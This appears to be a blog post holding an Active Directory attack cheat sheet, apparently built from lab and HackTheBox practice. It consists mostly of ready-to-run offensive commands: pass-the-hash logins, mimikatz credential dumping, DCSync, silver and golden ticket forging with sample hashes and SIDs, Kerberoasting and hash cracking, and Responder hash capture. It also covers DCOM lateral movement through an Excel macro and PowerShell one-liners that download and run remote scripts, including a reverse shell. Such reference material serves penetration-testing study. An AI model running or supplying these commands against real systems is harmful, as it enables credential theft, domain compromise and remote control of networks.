Month: May 2022

Uncategorized

Active Directory

RUNDOWN OF USEFUL TECHNIQUES

====================================================== TGT USE WITH AUTHENTICATION └─$ kerbrute -dc-ip 10.10.1.299 -domain domain.com -user user01 -password password12345 └─$ KRB5CCNAME=user01.ccache impacket-psexec -k -no-pass domain.com/[email protected] ====================================================== CONNECTIONS VIA CRACKMAPEXEC PTH EVIL-WINRM FIND ACCOUNT LOCKOUT ATTEMPTS IF ABLE: PS C:Userscomputer.corp> net accounts └─$ crackmapexec smb 10.10.1.299 -u user01 -p password12345 └─$ crackmapexec smb 10.10.1.299 -u user01 -p password12345 -M mimikatz └─$ crackmapexec smb 10.10.1.299 -u administrator -H'ee0e207898a5beee01f38115019ee2fb' --local-auth --sam └─$ pth-winexe -U Administrator%ee0e207898a5beee01f38115019ee2fb:ee0e207898a5beee01f38115019ee2fb //10.10.1.299 cmd └─$ evil-winrm -u user03 -p password12345 -i 10.10.1.299 └─$ xfreerdp /u:user04 /d:domain.com /p:user04:password12345 /v:10.10.1.299 └─$ rdesktop 10.10.1.299 -u user03 -p password12345 C:tmp>.psexec.exe \dc-dc01 cmd.exe (MAYBE...) THE PTH OPENS A SHELL ON THE DESKTOP, SO REMOTE IN TO DO THIS mimikatz # sekurlsa::pth /user:user05_admin /domain:corp.com /ntlm:e2b475e11da2a0748290d87ee966e327 /run:PowerShell.exe ====================================================== SCRIPTS SERVICE ACCOUNTS IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/svc_script.ps1') LIST USERS IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/users_script.ps1') LIST EVERYTHING IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/all_script.ps1') SPECIFY A NAME BY CHANGING THE SCRIPT IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/specific_name_script.ps1') POWERVIEW IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/PowerView.ps1') CHECK CREDENTIALS BY CHANGING THE SCRIPT IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/credentials_script.ps1') <-- ONLY TO VERIFY KERBEROAST IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-Kerberoast.ps1') REVERSE SHELL (NISHANG) IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-PowerShellTcp.ps1') ====================================================== KERBEROAST - NEED PRIV'D ACCOUNT (LIKE ADMINISTRATOR) IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-Kerberoast.ps1') Invoke-Kerberoast -outputformat hashcat | fl └─$ hashcat -m 13100 svc.hash /usr/share/wordlists/rockyou.txt ====================================================== CREATE REVERSE DNS ENTRY ON THE DC (FROM HTB INTELLIGENCE) python3 dnstool.py -u 'intelligencetiffany.molina' -p NewIntelligenceCorpUser9876 -r webstuff.intelligence.htb -a add -t A -d 10.10.14.9 10.129.95.154 VERIFY └─$ nslookup > server 10.129.95.154 > webstuff.intelligence.htb ====================================================== IF YOU SEE GMSA PRIVILEGES (FROM HTB INTELLIGENCE) └─$ python3 gMSADumper.py -u 'ted.graves' -p Mr.Teddy -d intelligence.htb LOOKING FOR SERVICE ACCOUNT HASH DUMPS THIS DUMPS THE HASH FOR THE SERVICE ACCOUNT svc_int$:::16cba97b4bc423795585b0b4bcee5047 ====================================================== TIME SYNC └─$ timedatectl set-ntp false └─$ sudo rdate -n dc.intelligence.htb OPTIONAL: sudo ntpdate 10.129.95.154 ====================================================== DC SYNC mimikatz # lsadump::dcsync /user:Administrator ====================================================== SILVER TICKET USING SERVICE ACCOUNT DISCOVERED USING GMSA (svc_int$) └─$ impacket-getST -spn www/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int -hashes HASH:HASH └─$ KRB5CCNAME=Administrator.ccache impacket-psexec -k -no-pass intelligence.htb/[email protected] ====================================================== GOLDEN BUT NOT GOLDEN TICKET C:>whoami /user (LOOKING FOR SID) mimikatz # kerberos::purge mimikatz # kerberos::list mimikatz # kerberos::golden /user:user02 /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2555479668 /target:CorpWebServer.corp.com /service:HTTP /rc4:e2b475e11da2a0748290d87ee966e327 /ptt mimikatz # kerberos::list READOUT TO GOLDEN: /user /domain /sid /target /service:HTTP /rc4 NOTE: CAN'T DO THIS WITH CLEAR-TEXT PASSWORD... MUST HASH FIRST ====================================================== GOLDEN TICKET C:Toolsactive_directory> psexec.exe \dc01 cmd.exe ACCESS DENIED WHICH CACHES THE HASH mimikatz # privilege::debug mimikatz # lsadump::lsa /patch mimikatz # kerberos::purge mimikatz # kerberos::golden /user:fakeuser /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2599470068 /krbtgt:75b60230a2394a812000dbfad8415965 /ptt mimikatz # misc::cmd C:Usersuser02.crop> psexec.exe \dc01 cmd.exe ====================================================== DCOM - DISTRIBUTED COMPONENT OBJECT MODEL (LATERAL MOVEMENT) SHOW AVAILABLE METHODS - LOOKING FOR RUN AND WORKBOOK $com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110")) $com | Get-Member CREATE VBA MACRO (SHELL CODE GOES IN PLACE OF NOTEPAD) Sub mymacro() Shell ("notepad.exe") End Sub SCRIPT TO RUN, WILL CONNECT AND RUN THE MACRO $Path = "\192.168.1.110c$WindowssysWOW64configsystemprofileDesktop" $temp = [system.io.directory]::createDirectory($Path) $com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110")) $LocalPath = "C:Usersuser05_admin.corpmyexcel.xls" $RemotePath = "\192.168.1.110c$myexcel.xls" [System.IO.File]::Copy($LocalPath, $RemotePath, $True) $Path = "\192.168.1.110c$WindowssysWOW64configsystemprofileDesktop" $temp = [system.io.directory]::createDirectory($Path) $Workbook = $com.Workbooks.Open("C:myexcel.xls") $com.Run("mymacro") ====================================================== SERVICE TICKET REQUEST mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords mimikatz # sekurlsa::tickets PS C:tmp> Add-Type -AssemblyName System.IdentityModel PS C:tmp> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/MSSQL.domain.com' PS C:tmp> klist THEN MIMIKATS sekurlsa::tickets - we see the ticket for HTTP kerberos::list /export THEN SEND THE FILE TO ATTACK COMPUTER PS C:tmp> copy .2-40a50000-client06$@HTTP~MSSQL.domain.com-SVCORP.COM.kirbi \192.168.119.299share THEN CRACK └─$ ./tgsrepcrack.py /usr/share/wordlists/rockyou.txt mssql.kirbi CRACK WITH JOHN OR HASHCAT kirbi2john mssql.kirbi > mssql.hash john mssql.hash hashcat -m 5600 user04.hash /usr/share/wordlists/rockyou.txt ====================================================== POWERVIEW IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/PowerView.ps1') Get-NetSession -ComputerName client06 (WORKED) Get-NetLoggedon -ComputerName client06 (WORKED) ====================================================== RESPONDER └─$ sudo responder -I tun0 THEN REQUEST SMB FILE SHARES VIA AUTHENTICATION PS C:tmptickets> net use \192.168.119.299share /USER:domain.comuser04 ON REMOTE DESKTOP, THIS WORKED, RESPONDER GOT THE RIGHT HASH!!! PS C:tmptickets> net use \192.168.119.299share MAY ASK FOR USERNAME/PASS... JUST QUIT OUT OF IT (or use domain.comuser03) ====================================================== BLOODHOUND └─$ python3 /opt/opt/BloodHound.py/bloodhound.py -ns 10.10.1.299 -d domain.com -dc dc-dc02.domain.com -u user03 -p password12345 -c All sudo neo4j console BLOUDHOUND GUI - CHANGE PASSWORD http://localhost:7474 bloodhound IMPORT THE JSON FILES ====================================================== SMB FILE MOVEMENT AUTHENTICATE: PS C:tmptickets> net use \192.168.119.299share student /USER:student MOVE FILES: PS C:tmptickets> copy .FILE.kirbi \192.168.119.299share TO STOP THE SHARE: net use \192.168.119.299share /DELETE ====================================================== AD SCRIPT REFERENCE ALL ACCOUNTS ------------------- IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/all_script.ps1') ------------------- $domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() $PDC = ($domainObj.PdcRoleOwner).Name $SearchString = "LDAP://" $SearchString += $PDC + "/" $DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))" $SearchString += $DistinguishedName $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString) $objDomain = New-Object System.DirectoryServices.DirectoryEntry $Searcher.SearchRoot = $objDomain $Searcher.filter="samAccountType=805306368" $Result = $Searcher.FindAll() Foreach($obj in $Result) { Foreach($prop in $obj.Properties) { $prop } Write-Host "------------------------" } AD SCRIPT REFERENCE SERVICE ACCOUNTS ------------------- IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/svc_script.ps1') ------------------- $domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() $PDC = ($domainObj.PdcRoleOwner).Name $SearchString = "LDAP://" $SearchString += $PDC + "/" $DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))" $SearchString += $DistinguishedName $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString) $objDomain = New-Object System.DirectoryServices.DirectoryEntry $Searcher.SearchRoot = $objDomain $Searcher.filter="serviceprincipalname=*http*" $Result = $Searcher.FindAll() Foreach($obj in $Result) { Foreach($prop in $obj.Properties) { $prop } } AD SCRIPT REFERENCE LIST USERS ------------------- IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/users_script.ps1') ------------------- $domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() $PDC = ($domainObj.PdcRoleOwner).Name $SearchString = "LDAP://" $SearchString += $PDC + "/" $DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))" $SearchString += $DistinguishedName $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString) $objDomain = New-Object System.DirectoryServices.DirectoryEntry $Searcher.SearchRoot = $objDomain $Searcher.filter="samAccountType=805306368" $Searcher.FindAll() AD SCRIPT REFERENCE CHANGE SCRIPT TO GET A CERTAIN NAME ------------------- IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/specific_name_script.ps1') ------------------- $domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() $PDC = ($domainObj.PdcRoleOwner).Name $SearchString = "LDAP://" $SearchString += $PDC + "/" $DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))" $SearchString += $DistinguishedName $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString) $objDomain = New-Object System.DirectoryServices.DirectoryEntry $Searcher.SearchRoot = $objDomain $Searcher.filter="name=Domain Admins" $Searcher.FindAll()

Scroll to top